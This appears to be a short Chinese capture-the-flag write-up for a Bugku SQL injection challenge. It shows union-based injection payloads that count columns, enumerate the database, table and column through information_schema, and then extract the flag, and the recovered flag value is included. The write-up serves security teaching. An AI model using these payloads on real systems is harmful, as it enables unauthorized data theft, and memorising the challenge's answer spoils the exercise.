可以看出应该为sql联合注入
SQL注入之联合查询注入
-
要求查询列数相同,其中有Name、Math、 English、Chinese 一共四个数据,因此需要select 1,2,3,4
构造语句id=0' union select 1,2,3,4#
-
查询数据库
id=0' union select 1,2,3,database()#
找到数据库 skctf_flag -
查询数据表
id=0' union select 1,2,3,table_name from information_schema.tables where table_schema='skctf_flag'#
找到数据表 fl4g -
查询列名
id=0' union select 1,2,3,column_name from information_schema.columns where table_name='fl4g'#
找到列名为 skctf_flag -
查询值
id=0' union select 1,2,3,skctf_flag from fl4g#
得到flag BUGKU{Sql_INJECT0N_4813drd8hz4}